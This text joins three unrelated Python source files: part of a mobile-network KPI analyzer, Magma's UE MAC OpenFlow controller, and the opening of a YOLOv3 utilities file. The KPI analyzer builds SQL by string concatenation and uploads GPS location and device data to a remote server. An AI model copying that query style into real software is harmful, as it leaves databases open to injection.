def __db_query(self, sql_cmd):
"""
Return query result of a sql_cmd
"""
try:
if is_android:
sql_res = self.__db.rawQuery(sql_cmd, None)
else:
sql_res = self.__db.execute(sql_cmd).fetchall()
# print sql_res
# if sql_res.getCount()==0: #the id does not exist
if (is_android and sql_res.getCount() == 0) or (
not is_android and len(sql_res) == 0):
return None
if is_android:
sql_res.moveToFirst()
# convert string to dictionary
res = sql_res.getString(0)
else:
res = sql_res[0][0]
return res
except BaseException: # TODO: raise warnings
return None
def local_query_kpi(self, kpi_name, cell_id = None, timestamp = None):
"""
Query the phone's locally observed KPI
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param cell_id: cell global id
:type cell_id: string
:param timestamp: The timestamp of the KPI. If None, this function returns the latest KPI
:type timestamp: datetime
:returns: The KPI value, or None if the KPI is not available
"""
if not self.__db_enabled:
self.log_warning("Database is not enabled.")
return None
# cell_id = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_id()
# cell_id = cell_id if cell_id else None
kpi_name = kpi_name.replace('.', '_')
# print kpi_name
if kpi_name.endswith('SR'):
if cell_id:
if 'HO' in kpi_name:
kpi_suc = kpi_name[:-2]+'FAILURE'
else:
kpi_suc = kpi_name[:-2]+'SUC'
if timestamp:
sql_cmd = "select count(*) from " + kpi_suc + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\""
else:
sql_cmd = "select count(*) from " + kpi_suc + " where cell_id=\"" + str(cell_id) +"\""
# print sql_cmd
suc_num = self.__db_query(sql_cmd)
if 'HO' in kpi_name:
kpi_req = kpi_name[:-2]+'TOTAL'
else:
kpi_req = kpi_name[:-2]+'REQ'
if timestamp:
sql_cmd = "select count(*) from " + kpi_req + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\""
else:
sql_cmd = "select count(*) from " + kpi_req + " where cell_id=\"" + str(cell_id) +"\""
# print sql_cmd
req_num = self.__db_query(sql_cmd)
else:
if 'HO' in kpi_name:
kpi_suc = kpi_name[:-2]+'FAILURE'
else:
kpi_suc = kpi_name[:-2]+'SUC'
if timestamp:
sql_cmd = "select count(*) from " + kpi_suc + " where timestamp<\"" + \
str(timestamp) + "\""
else:
sql_cmd = "select count(*) from " + kpi_suc
# print sql_cmd
suc_num = self.__db_query(sql_cmd)
if 'HO' in kpi_name:
kpi_req = kpi_name[:-2]+'TOTAL'
else:
kpi_req = kpi_name[:-2]+'REQ'
if timestamp:
sql_cmd = "select count(*) from " + kpi_req + " where timestamp<\"" + \
str(timestamp) + "\""
else:
sql_cmd = "select count(*) from " + kpi_req
# print sql_cmd
req_num = self.__db_query(sql_cmd)
# print suc_num, req_num
if req_num and suc_num and int(req_num) > 0:
if 'HO' in kpi_name:
                    return '{:.2f}'.format(float(int(req_num) - int(suc_num))/int(req_num)*100)+'%'
else:
return '{:.2f}'.format(float(suc_num)/int(req_num)*100)+'%'
return None
elif kpi_name.endswith('SUC') or kpi_name.endswith('REQ') or \
kpi_name.endswith('TOTAL') or kpi_name.endswith('FAILURE'):
if cell_id:
if timestamp:
sql_cmd = "select count(*) from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\""
else:
sql_cmd = "select count(*) from " + kpi_name + " where cell_id=\"" + str(cell_id) +"\""
else:
if timestamp:
sql_cmd = "select count(*) from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\""
else:
sql_cmd = "select count(*) from " + kpi_name
# print sql_cmd
value = self.__db_query(sql_cmd)
if value:
return str(value)
return None
elif kpi_name.endswith('TPUT'):
if cell_id:
if timestamp:
sql_cmd = "select value from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\" order by id desc limit 1"
else:
sql_cmd = "select value from " + kpi_name + " where cell_id=\"" + \
str(cell_id) +"\" order by id desc limit 1"
else:
if timestamp:
sql_cmd = "select value from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\" order by id desc limit 1"
else:
sql_cmd = "select value from " + kpi_name + " order by id desc limit 1"
# print sql_cmd
value = self.__db_query(sql_cmd)
if value:
return str(value)
return None
def remote_query_kpi(self, kpi_name, phone_model, operator, gps, timestamp):
"""
Query the remote cloud for the KPI
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param phone_model: The the phone model
:type phone_model: string
:param operator: The network operator
:type operator: string
:param gps: The GPS coordinate
:type gps: string
:param timestamp: The timestamp of the KPI.
:type timestamp: datetime
:returns: The KPI value, or None if the KPI is not available
"""
#TODO: Implement the query of remote database
return None
def set_periodicity(self, kpi_showname, periodicity):
"""
Set periodicity of the analyzer
:param kpi_showname: The KPI to be queried, this is the showname
:type kpi_showname: string
        :param periodicity: the period; a plain number means seconds, and the suffixes s, m, h, d denote seconds, minutes, hours and days
:type periodicity: string
"""
try:
kpi_name = kpi_showname.replace('.', '_')
if periodicity.isdigit():
self.__periodicity[kpi_name] = int(periodicity)
elif periodicity.endswith('s'):
self.__periodicity[kpi_name] = int(periodicity[:-1])
elif periodicity.endswith('m'):
self.__periodicity[kpi_name] = int(periodicity[:-1])*60
elif periodicity.endswith('h'):
self.__periodicity[kpi_name] = int(periodicity[:-1])*60*60
elif periodicity.endswith('d'):
self.__periodicity[kpi_name] = int(periodicity[:-1])*60*60*24
self.__last_updated[kpi_name] = None
self.log_info("Priority set for "+kpi_showname+': '+periodicity)
return True
except:
self.log_info("Priority set failed for "+kpi_showname+': '+periodicity)
return False
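    # Illustrative sketch, not from the original module: throttle logging of a
    # (hypothetical) KPI to once every 30 minutes.
    #
    #   analyzer.set_periodicity('KPI.Accessibility.DUMMY_SR', '30m')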
def set_cell(self, kpi_showname, cell):
"""
        Set the logging cell of the analyzer
        :param kpi_showname: The KPI to be queried, this is the showname
        :type kpi_showname: string
        :param cell: the cell ID for which this KPI should be logged
        :type cell: string
"""
try:
kpi_name = kpi_showname.replace('.', '_')
self.__logcell[kpi_name] = cell
self.log_info("Logging cell set for "+kpi_showname+': '+str(cell))
return True
except:
self.log_info("Logging cell failed for "+kpi_showname+': '+periodicity)
return False
def store_kpi(self, kpi_name, kpi_value, timestamp, cur_location=None):
"""
Store the KPIs to the local database
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param kpi_value: The value of KPI or a dict {attribute <type: str>: value <type: str>}
:type kpi_value: string
        :param timestamp: the timestamp of the KPI value
:type timestamp: datetime
"""
if not self.__db_enabled:
self.log_warning("Database is not enabled.")
return True
# try:
phone_info = self.__get_phone_model()
operator_info = self.__get_operator_info()
# cur_location = self.__get_current_gps()
cell_id = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_id()
cell_id = cell_id if cell_id else "None"
tac = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_tac()
tac = tac if tac else "None"
downlink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_frequency()
downlink_frequency = downlink_frequency if downlink_frequency else "None"
uplink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_frequency()
uplink_frequency = uplink_frequency if uplink_frequency else "None"
downlink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_bandwidth()
downlink_bandwidth = downlink_bandwidth if downlink_bandwidth else "None"
uplink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_bandwidth()
uplink_bandwidth = uplink_bandwidth if uplink_bandwidth else "None"
allowed_access = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_allowed_access()
allowed_access = allowed_access if allowed_access else "None"
band_indicator = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_band_indicator()
band_indicator = band_indicator if band_indicator else "None"
#FIXME: How to handle the missing GPS location?
if not cur_location:
cur_location = ("None", "None")
if isinstance(kpi_value, str) or isinstance(kpi_value, int) or isinstance(kpi_value, float):
sql_cmd = "insert into " + kpi_name + "(value, timestamp," \
"op, phone_model, gps, cell_id, tai_id, dl_freq, ul_freq, dl_bw, ul_bw," \
"allowed_access, band_id) values(\"" + \
str(kpi_value) + "\"," + "\"" + str(timestamp) \
+ "\"," + "\"" + operator_info \
+ "\"," + "\"" + phone_info \
+ "\"," + "\"" + str(cur_location[0])+"|"+str(cur_location[1]) \
+ "\"," + "\"" + str(cell_id) \
+ "\"," + "\"" + str(tac) \
+ "\"," + "\"" + str(downlink_frequency) \
+ "\"," + "\"" + str(uplink_frequency) \
+ "\"," + "\"" + str(downlink_bandwidth) \
+ "\"," + "\"" + str(uplink_bandwidth) \
+ "\"," + "\"" + str(allowed_access) \
+ "\"," + "\"" + str(band_indicator) \
+ "\")"
else:
idx_str = ""
value_str = ""
for attribute in kpi_value:
idx_str += (attribute + ', ')
value_str += ("\"" + str(kpi_value[attribute]) + "\"," )
sql_cmd = "insert into " + kpi_name + "(" + idx_str + \
" timestamp, op, phone_model, gps, cell_id, tai_id, dl_freq, ul_freq, dl_bw, ul_bw," \
"allowed_access, band_id) values(" + value_str + "\""+ str(timestamp) \
+ "\"," + "\"" + operator_info \
+ "\"," + "\"" + phone_info \
+ "\"," + "\"" + str(cur_location[0])+"|"+str(cur_location[1]) \
+ "\"," + "\"" + str(cell_id) \
+ "\"," + "\"" + str(tac) \
+ "\"," + "\"" + str(downlink_frequency) \
+ "\"," + "\"" + str(uplink_frequency) \
+ "\"," + "\"" + str(downlink_bandwidth) \
+ "\"," + "\"" + str(uplink_bandwidth) \
+ "\"," + "\"" + str(allowed_access) \
+ "\"," + "\"" + str(band_indicator) \
+ "\")"
# print(sql_cmd)
if is_android:
self.__db.execSQL(sql_cmd)
else:
self.__db.execute(sql_cmd)
self.__conn.commit()
self.__log_kpi(kpi_name, timestamp, cell_id, kpi_value)
return True
# except BaseException: # TODO: raise warnings
# return False
def __log_kpi(self, kpi_name, timestamp, cell_id, kpi_value):
"""
:param kpi_name: The KPI to be queried
:type kpi_name: string
        :param timestamp: the timestamp of the KPI value
:type timestamp: datetime
:param cell_id: updated kpi cell id
:type cell_id: string
"""
if kpi_name in self.__last_updated:
            # if a logging cell is specified, check whether the cell ids match
if not self.__logcell[kpi_name] or self.__logcell[kpi_name] and self.__logcell[kpi_name] == str(cell_id):
kpi_showname = kpi_name.replace('_', '.')
                # if periodicity mode is enabled, check whether the time gap is long enough
if not self.__last_updated[kpi_name] or (timestamp - self.__last_updated[kpi_name]).total_seconds() > self.__periodicity[kpi_name]:
self.__last_updated[kpi_name] = timestamp
if kpi_name.endswith('_LOSS') or kpi_name.endswith('_BLER'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(kpi_value) + '%')
elif kpi_name.endswith('_TPUT'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(kpi_value) + 'bps')
elif kpi_name.endswith('_LATENCY') or kpi_name.endswith('_HOL'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(kpi_value) + 'ms')
elif kpi_name.endswith('_PREDICTION'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=Triggered')
else:
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(self.local_query_kpi(kpi_name)))
# check the stats updated with instance value
if kpi_name.endswith('SUC') or kpi_name.endswith('FAILURE'):
kpi_name=kpi_name.replace('SUC', 'SR')
kpi_name=kpi_name.replace('FAILURE', 'SR')
if kpi_name in self.__last_updated:
if not self.__logcell[kpi_name] or self.__logcell[kpi_name] and self.__logcell[kpi_name] == str(cell_id):
kpi_showname = kpi_name.replace('_', '.')
if not self.__last_updated[kpi_name] or (timestamp - self.__last_updated[kpi_name]).total_seconds() > self.__periodicity[kpi_name]:
self.__last_updated[kpi_name] = timestamp
kpi_showname = kpi_name.replace('_', '.')
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(self.local_query_kpi(kpi_name)))
def __upload_kpi_thread(self,e):
"""
Internal thread to upload the KPI
"""
while True:
if KpiAnalyzer.pending_upload_task:
while True:
activeNetworkInfo = ConnectivityManager.getActiveNetworkInfo()
if activeNetworkInfo and activeNetworkInfo.isConnected():
break
e.wait(1)
while KpiAnalyzer.pending_upload_task:
item = KpiAnalyzer.pending_upload_task.popleft()
# self.__upload_kpi_async(item[0],item[1])
while not self.__upload_kpi_async(item[0],item[1],item[2]):
e.wait(5)
e.wait(5)
def __upload_kpi_async(self,kpi_name, kpi_value, cur_location):
"""
Upload the KPI value to the cloud
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param kpi_value: The value of KPI
:type kpi_value: string
"""
self.log_debug("uploading kpi: "+kpi_name)
if is_android:
phone_info = self.__get_phone_model()
operator_info = self.__get_operator_info()
# cur_location = self.__get_current_gps()
cell_id = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_id()
cell_id = cell_id if cell_id else "None"
tac = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_tac()
tac = tac if tac else "None"
downlink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_frequency()
downlink_frequency = downlink_frequency if downlink_frequency else ""
uplink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_frequency()
uplink_frequency = uplink_frequency if uplink_frequency else ""
downlink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_bandwidth()
downlink_bandwidth = downlink_bandwidth if downlink_bandwidth else ""
uplink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_bandwidth()
uplink_bandwidth = uplink_bandwidth if uplink_bandwidth else ""
allowed_access = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_allowed_access()
allowed_access = allowed_access if allowed_access else ""
band_indicator = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_band_indicator()
band_indicator = band_indicator if band_indicator else ""
#FIXME: How to handle the missing GPS location?
if not cur_location:
cur_location = "None"
for item in kpi_value:
if not kpi_value[item]:
kpi_value[item] = "None"
httpClient = None
try:
postdata = {'Phone_model': phone_info,
'operator': operator_info,
'GPS': str(cur_location[0])+"|"+str(cur_location[1]),
'Time': time.time(),
'Cell_ID': str(cell_id),
'TAI_ID' : str(tac),
'DL_Freq': str(downlink_frequency),
'UL_Freq': str(uplink_frequency),
'DL_Bandwidth': str(downlink_bandwidth),
'UL_Bandwidth': str(uplink_bandwidth),
'Allowed_access': str(allowed_access),
'Band indicator': str(band_indicator),
'KPI_type' : kpi_name,
'KPI_val': kpi_value,
}
# url = 'http://34.213.149.155/postdata/'
url = 'http://knowledge-map.xyz/postdata/'
# self.log_debug(str(postdata))
                jdata = json.dumps(postdata).encode('utf-8')  # urllib requires bytes for POST data
                req = urllib.request.Request(url, jdata)
response = urllib.request.urlopen(req)
self.log_debug("New KPI uploaded:" + kpi_name)
if httpClient:
httpClient.close()
return True
except Exception as e:
# import traceback
# self.log_error(str(traceback.format_exc()))
self.log_warning("Fail to upload the KPI: "+ kpi_name)
if httpClient:
httpClient.close()
return False
else:
self.log_info("New KPI (uploading skipped): "+kpi_name)
return True
def upload_kpi(self,kpi_name, kpi_value):
"""
Upload the KPI value to the cloud
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param kpi_value: The value of KPI
:type kpi_value: string
"""
# self.log_info("New KPI: " + kpi_name)
cur_location = self.__get_current_gps()
KpiAnalyzer.pending_upload_task.append((kpi_name,kpi_value,cur_location))
def __get_phone_model(self):
if is_android:
#TODO: Optimization, avoid repetitive calls
res = mi2app_utils.get_phone_manufacturer()+"-"+mi2app_utils.get_phone_model()
# self.log_debug("Phone model: "+res)
return res
else:
return self.__phone_model
def __get_operator_info(self):
if is_android:
#TODO: Optimization, avoid repetitive calls
return mi2app_utils.get_operator_info()
else:
self.__op = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_op()
return self.__op
def __get_current_gps(self):
if is_android:
location = mi2app_utils.get_current_location()
# self.log_debug("Current location: "+str(location))
return location
else:
return ""
def set_phone_model(self, phone_model):
"""
Set phone model
:param phone_model: string
:return:
"""
self.__phone_model = phone_model
def set_operator(self, operator):
"""
Set operator
:param operator: string
:return:
"""
self.__op = operator
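# Illustrative sketch, not part of MobileInsight: a minimal analyzer built on
# KpiAnalyzer. The KPI names, the message callback and its wiring are
# hypothetical; they only show how register_kpi(), store_kpi() and
# local_query_kpi() are intended to fit together.
#
#   class DummyKpiAnalyzer(KpiAnalyzer):
#       def __init__(self):
#           KpiAnalyzer.__init__(self)
#           self.enable_local_storage(True)
#           self.register_kpi("Accessibility", "DUMMY_REQ", self.__msg_callback)
#           self.register_kpi("Accessibility", "DUMMY_SUC", self.__msg_callback)
#           self.add_source_callback(self.__msg_callback)
#
#       def __msg_callback(self, msg):
#           # record one request and one success, then read back the success rate
#           self.store_kpi("KPI_Accessibility_DUMMY_REQ", '1', msg.timestamp)
#           self.store_kpi("KPI_Accessibility_DUMMY_SUC", '1', msg.timestamp)
#           print(self.local_query_kpi("KPI.Accessibility.DUMMY_SR"))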
|
ue_mac.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
from typing import List
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import packet
from ryu.lib.packet import ether_types, dhcp
from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
from lte.protos.pipelined_pb2 import FlowResponse, SetupFlowsResult, \
UEMacFlowRequest
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import encode_imsi, decode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
class UEMacAddressController(MagmaController):
"""
UE MAC Address Controller
This controller controls table 0 which is the first table every packet
touches. It matches on UE MAC address and sets IMSI metadata
"""
APP_NAME = "ue_mac"
APP_TYPE = ControllerType.SPECIAL
def __init__(self, *args, **kwargs):
super(UEMacAddressController, self).__init__(*args, **kwargs)
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_table_num(INGRESS)
self.arpd_controller_fut = kwargs['app_futures']['arpd']
self.arp_contoller = None
self._datapath = None
tbls = self._service_manager.allocate_scratch_tables(self.APP_NAME, 2)
self._passthrough_set_tbl = tbls[0]
self._dhcp_learn_scratch = tbls[1]
self._li_port = None
self._imsi_set_tbl_num = \
self._service_manager.INTERNAL_IMSI_SET_TABLE_NUM
self._ipfix_sample_tbl_num = \
self._service_manager.INTERNAL_IPFIX_SAMPLE_TABLE_NUM
self._app_set_tbl_num = self._service_manager.INTERNAL_APP_SET_TABLE_NUM
if 'li_local_iface' in kwargs['config']:
self._li_port = \
BridgeTools.get_ofport(kwargs['config']['li_local_iface'])
self._dpi_port = \
BridgeTools.get_ofport(kwargs['config']['dpi']['mon_port'])
def initialize_on_connect(self, datapath):
self.delete_all_flows(datapath)
self._datapath = datapath
self._install_default_flows()
def cleanup_on_disconnect(self, datapath):
self.delete_all_flows(datapath)
def handle_restart(self, ue_requests: List[UEMacFlowRequest]
) -> SetupFlowsResult:
"""
        Re-install the default and per-UE MAC flows after a restart.
"""
        # TODO: Potentially we could diff against existing flows, but there is
        # little benefit (we don't need stats here)
self.delete_all_flows(self._datapath)
self._install_default_flows()
for ue_req in ue_requests:
self.add_ue_mac_flow(ue_req.sid.id, ue_req.mac_addr)
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.handle_restart(ue_requests)
self.init_finished = True
return SetupFlowsResult(result=SetupFlowsResult.SUCCESS)
def delete_all_flows(self, datapath):
flows.delete_all_flows_from_table(datapath, self.tbl_num)
flows.delete_all_flows_from_table(datapath, self._passthrough_set_tbl)
flows.delete_all_flows_from_table(datapath, self._dhcp_learn_scratch)
flows.delete_all_flows_from_table(datapath, self._imsi_set_tbl_num)
def add_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return FlowResponse(result=FlowResponse.FAILURE)
uplink_match = MagmaMatch(eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
# For handling internal ipfix pkt sampling
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
return FlowResponse(result=FlowResponse.SUCCESS)
def delete_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return
uplink_match = MagmaMatch(eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._delete_resubmit_flow(sid, uplink_match,
tbl_num=self._imsi_set_tbl_num)
self._delete_resubmit_flow(sid, downlink_match,
tbl_num=self._imsi_set_tbl_num)
def add_arp_response_flow(self, imsi, yiaddr, chaddr):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.add_ue_arp_flows(self._datapath,
yiaddr, chaddr)
self.logger.debug("From DHCP learn: IMSI %s, has ip %s and mac %s",
imsi, yiaddr, chaddr)
# Associate IMSI to IPv4 addr in directory service
threading.Thread(target=update_record, args=(str(imsi),
yiaddr)).start()
else:
self.logger.error("ARPD controller not ready, ARP learn FAILED")
def _add_resubmit_flow(self, sid, match, action=None,
priority=flows.DEFAULT_PRIORITY,
next_table=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if next_table is None:
next_table = self.next_table
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
if sid:
actions.append(parser.NXActionRegLoad2(dst=IMSI_REG,
value=encode_imsi(sid)))
flows.add_resubmit_next_service_flow(self._datapath, tbl_num,
match, actions=actions,
priority=priority,
resubmit_table=next_table)
def _delete_resubmit_flow(self, sid, match, action=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.delete_flow(self._datapath, tbl_num, match, actions=actions)
def _add_dns_passthrough_flows(self):
parser = self._datapath.ofproto_parser
        # Set passthrough so the packet skips enforcement and is sent to egress
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53)
self._add_resubmit_flow(None, ulink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53)
self._add_resubmit_flow(None, dlink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS over tls
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=853)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=853)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
def _add_dhcp_passthrough_flows(self):
ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67)
self._add_resubmit_flow(None, uplink_match, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68)
        # Resubmit to a scratch table that triggers a packet-in, so we can learn the IP for the ARP response
self._add_resubmit_flow(None, downlink_match, action,
flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch,
tbl_num=self._passthrough_set_tbl)
# Install default flow for dhcp learn scratch
flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
match=MagmaMatch(), actions=[],
priority=flows.PASSTHROUGH_PRIORITY,
output_port=ofproto.OFPP_CONTROLLER,
copy_table=self.next_table,
max_len=ofproto.OFPCML_NO_BUFFER)
def _add_uplink_arp_allow_flow(self):
arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
arp_match, actions=[],
priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _learn_arp_entry(self, ev):
"""
        Learn action to process packet-in DHCP packets. DHCP ACK packets are
        used to learn the ARP entry for the UE and install rules in the ARP
        table. The DHCP packets are then sent through the pipeline.
"""
msg = ev.msg
if self._dhcp_learn_scratch != msg.table_id:
# Intended for other application
return
try:
encoded_imsi = _get_encoded_imsi_from_packetin(msg)
# Decode the imsi to properly save in directoryd
imsi = decode_imsi(encoded_imsi)
except MagmaOFError as e:
# No packet direction, but intended for this table
self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
return
pkt = packet.Packet(msg.data)
dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
# DHCP yiaddr is the client(UE) ip addr
# chaddr is the client mac address
self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)
def _install_default_flows(self):
"""
Install default flows
"""
        # Allow ARP packets from the uplink (no eth_dst match) to go to the ARP table
self._add_uplink_arp_allow_flow()
self._add_dhcp_passthrough_flows()
self._add_dns_passthrough_flows()
self._add_resubmit_flow(None, MagmaMatch(),
priority=flows.MINIMUM_PRIORITY,
tbl_num=self._passthrough_set_tbl)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(None, MagmaMatch(in_port=self._dpi_port),
priority=flows.PASSTHROUGH_PRIORITY,
next_table=self._app_set_tbl_num)
if self._li_port:
match = MagmaMatch(in_port=self._li_port)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
match, actions=[], priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
        # TODO We might want a default drop-all rule with minimum priority, but
        # adding it breaks all unit tests for this controller (needs work)
def _get_encoded_imsi_from_packetin(msg):
"""
Retrieve encoded imsi from the Packet-In message, or raise an exception if
it doesn't exist.
"""
imsi = msg.match.get(IMSI_REG)
if imsi is None:
raise MagmaOFError('IMSI not found in OFPMatch')
return imsi
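# Illustrative sketch, not part of Magma: the call pattern a gRPC servicer
# sitting above this controller would typically use. The function and request
# field names are hypothetical.
#
#   def handle_add_ue_mac(request, ue_mac_controller):
#       # request.sid.id carries the IMSI, request.mac_addr the UE MAC address
#       resp = ue_mac_controller.add_ue_mac_flow(request.sid.id, request.mac_addr)
#       if resp.result != FlowResponse.SUCCESS:
#           raise RuntimeError("failed to install UE MAC flows")
#       return resp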
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
from tools.Detection_to_XML import CreateXMLfile
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
